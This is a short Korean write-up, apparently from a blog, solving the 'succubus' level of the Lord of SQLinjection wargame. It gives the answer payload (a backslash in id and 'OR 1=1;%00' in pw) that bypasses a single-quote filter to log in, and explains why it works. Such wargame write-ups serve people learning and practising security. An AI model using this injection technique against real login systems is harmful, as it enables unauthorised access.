Lord of SQLinjection - succubus

https://los.rubiya.kr/chall/succubus_37568a99f12e6bd2f097e8038f74d768.php

https://los.rubiya.kr/chall/succubus_37568a99f12e6bd2f097e8038f74d768.php

아이디와 패스워드를 입력을 받고 있으며, (')를 사용하면 안 된다. 

 

 

 

 

 

 

 

 

정답) 

?id=\&pw=OR 1=1;%00

 

id에 주석처리를 해서 pw의 첫번째 ' 까지 문자열 형태로 만든다. 

id='\' and pw='OR 1=1;%00

 

그리고 참이 되는 조건과 뒤의 '를 무시하기 위해 주석처리를 해주면 해결